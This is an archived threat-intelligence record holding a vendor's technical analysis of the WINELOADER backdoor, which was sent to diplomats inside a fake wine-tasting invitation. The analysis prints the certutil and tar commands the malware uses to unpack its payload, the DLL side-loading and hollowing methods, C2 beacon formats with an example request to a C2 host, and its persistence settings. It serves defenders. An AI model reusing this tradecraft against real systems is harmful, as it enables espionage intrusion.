{ "id": "eaf32baa-4493-4747-a7fb-379de0f282cb", "created_at": "2026-04-06T00:09:18.595751Z", "updated_at": "2026-04-10T03:33:24.022124Z", "deleted_at": null, "sha1_hash": "cef401381247501890cedb23e9107a08ce1a9509", "title": "WINELOADER Analysis | ThreatLabz", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1313839, "plain_text": "WINELOADER Analysis | ThreatLabz\r\nBy Sudeep Singh, Roy Tay\r\nPublished: 2024-02-27 · Archived: 2026-04-05 13:53:51 UTC\r\nTechnical Analysis\r\nIn this section, we provide a detailed analysis of each component of the attack chain initiated when a victim\r\nreceives and clicks on the link within the PDF.\r\nPDF analysis\r\nThe PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s\r\nresidence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The\r\ninvitation contains a link to a fake questionnaire, which kickstarts the infection chain.\r\nThe malicious link in the PDF invitation redirects users to a compromised site,\r\nhxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file -\r\nwine.hta.\r\nFigure 2 below shows the contents of the PDF file.\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 1 of 8\n\nFigure 2: The PDF invitation showcasing the malicious link.\r\nA quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the\r\ntime of creation was January 29th, 2024, at 10:38 AM UTC.\r\nHTA file analysis\r\nThe HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next\r\nstage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the\r\npublicly available obfuscator obfuscator.io.\r\nFigure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to\r\ndisguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and\r\nincludes information about the wine-tasting event in February 2024.\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 2 of 8\n\nFigure 3: Obfuscated JavaScript code inside the HTA file.\r\nThe HTA file performs the following key functions:\r\nDownloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.php\r\nSaves the text file to the path: C:\\Windows\\Tasks\\text.txt\r\nUses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path:\r\nC:\\Windows\\Tasks\\text.zip. The command used is: certutil -decode C:\\Windows\\Tasks\\text.txt\r\nC:\\Windows\\\\Tasks\\text.zip\r\nExtracts the contents of the ZIP archive to the path: C:\\Windows\\Tasks\\. The command used is: tar -xf\r\nC:\\Windows\\Tasks\\text.zip -C C:\\Windows\\Tasks\\. The ZIP archive contains two files named sqlwriter.exe\r\nand vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and\r\nvcruntime140.dll is the malicious DLL crafted by the attacker which will be side-loaded automatically\r\nwhen sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any\r\nthreat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor\r\nin this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.\r\nExecutes sqlwriter.exe from the path: C:\\Windows\\Tasks\\ which will kick start the infection chain.\r\nWINELOADER binary analysis\r\nWhen executing sqlwriter.exe, it loads a malicious DLL named vcruntime140.dll from the same directory using\r\nDLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded\r\nWINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is\r\nshown in the screenshot below.\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 3 of 8\n\nFigure 4: Code section that decrypts and executes the WINELOADER core module.\r\nEach module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings,\r\nfollowed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 4 of 8\n\nFigure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.\r\nWINELOADER employs the following techniques to evade detection:\r\nSensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:\r\nThe core module and subsequent modules downloaded from the C2 server \r\nStrings (e.g. DLL filenames and API import function names)\r\nData sent and received from the C2 server\r\nSome strings are decrypted on use and re-encrypted shortly after.\r\nMemory buffers for storing results from API calls or decrypted strings are zeroed after use.\r\nDLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system\r\ndirectory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER\r\nincludes additional randomization code to ensure that different DLLs are chosen for each instance of DLL\r\nhollowing (see Figure 6).\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 5 of 8\n\nFigure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.\r\nWINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:\r\nadvapi32.dll\r\napi-ms-win-crt-math-l1-1-0.dll\r\napi-ms-win-crt-stdio-l1-1-0.dll\r\nbcryptprimitives.dll\r\niphlpapi.dll\r\nkernel32.dll\r\nkernelbase.dll\r\nmscoree.dll\r\nntdll.dll\r\nole32.dll\r\nrpcrt4.dll\r\nshlwapi.dll\r\nuser32.dll\r\nwininet.dll\r\nWINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the\r\nfirst beacon request to the C2 server.\r\nThe beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All\r\nrequests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1)\r\nGecko/20100101 Firefox/86.1, hardcoded into the sample itself.\r\nThe body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows.\r\nWe have appended a question mark to fields that we are unable to conclusively verify due to the limited data\r\ncollected. This information in available in the table below.\r\nOffset Length Name Description\r\n0x0 2\r\nLength of padding\r\nbytes (n)\r\nThis value is randomized (min: 255, max: 65535), stored in\r\nlittle-endian (LE).\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 6 of 8\n\nOffset Length Name Description\r\n0x2 n Padding bytes\r\nPadding bytes are randomly generated with the\r\nProcessPrng API.\r\n0x2 + n 8 Campaign ID? 5F D5 97 93 ED 26 CB 5A in the analyzed sample.\r\n0xa + n 8 Session ID? Randomly generated on execution.\r\n0x12 +\r\nn \r\n8 Local IP address The local IP address of the infected machine.\r\n0x20 +\r\nn\r\n512 Parent process name In Unicode\r\n0x220 +\r\nn\r\n512 User name In Unicode\r\n0x420 +\r\nn\r\n30 Machine name In Unicode\r\n0x43e +\r\nn\r\n4 Parent process ID In little-endian\r\n0x442 +\r\nn\r\n1\r\nParent process token\r\nelevation type\r\nInformation about the privileges of the token linked to the\r\nparent process.\r\n0x443 +\r\nn\r\n8\r\nPolling interval for C2\r\nrequests\r\nC0 d4 01 00 00 00 00 00 in the analyzed sample, translates\r\nto 120,000 ms or 2 mins between requests.\r\n0x44b +\r\nn\r\n1 Request type? 1 for beacon, 2 for status update\r\n0x44c +\r\nn\r\n8 Length of message In little-endian. 0 for beacon requests\r\n0x454 +\r\nn\r\n8 Unknown? Observed to match the value of the request type field.\r\n0x45c +\r\nn\r\n8 Module ID?\r\n00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2\r\n69 2E 85 64 for the persistence module.\r\n0x464 +\r\nn\r\nVaries Message Only observed for type 2 requests.\r\nTable 1: WINELOADER C2 beacon request fields\r\nAn example beacon request is shown below. The value of the Content-Length header varies across requests, as the\r\npadding length is randomized with a minimum of 1,381 bytes.\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 7 of 8\n\nGET /api.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1\r\nHost: castechtools.com\r\nContent-Length: 54674\r\n54,674 bytes of binary data in the request body (not shown here)\r\nThe same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response\r\nare shown in the table below.\r\nOffset Length Name Description\r\n0x0 2 Length of padding bytes (n) This value is stored in little-endian (LE).\r\n0x2 n Padding bytes Unused bytes\r\n0x2 + n 8 Campaign ID? 5F D5 97 93 ED 26 CB 5A in the analyzed sample\r\n0xa + n 1 Command Command from C2\r\n0xb + n  Varies Command data Binary data for command\r\nTable 2: WINELOADER C2 response fields\r\nThe core module supports three commands:\r\n1. Execute modules from the C2 either synchronously or asynchronously (via CreateThread)\r\n2. Inject itself into another DLL\r\n3. Update the sleep interval between beacon requests\r\nDuring our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and\r\nvcruntime.dll into the C:\\Windows\\Tasks directory and creates a scheduled task named MS SQL Writer with the\r\ndescription SQL Server VSS Writer 64-bit to execute C:\\Windows\\Tasks\\sqlwriter.exe daily.\r\nThe persistence module offers an alternative configuration to establish registry persistence at\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\MS SQL Writer.\r\nAfter establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2\r\nserver about the completed task. The request body mirrors the structure of the beacon request.\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" ], "report_names": [ "european-diplomats-targeted-spikedwine-wineloader" ], "threat_actors": [ { "id": "d13753da-34f2-4057-ac40-69c729539dd7", "created_at": "2024-03-02T02:00:03.826505Z", "updated_at": "2026-04-10T02:00:03.596616Z", "deleted_at": null, "main_name": "SPIKEDWINE", "aliases": [], "source_name": "MISPGALAXY:SPIKEDWINE", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434158, "ts_updated_at": 1775792004, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cef401381247501890cedb23e9107a08ce1a9509.pdf", "text": "https://archive.orkl.eu/cef401381247501890cedb23e9107a08ce1a9509.txt", "img": "https://archive.orkl.eu/cef401381247501890cedb23e9107a08ce1a9509.jpg" } }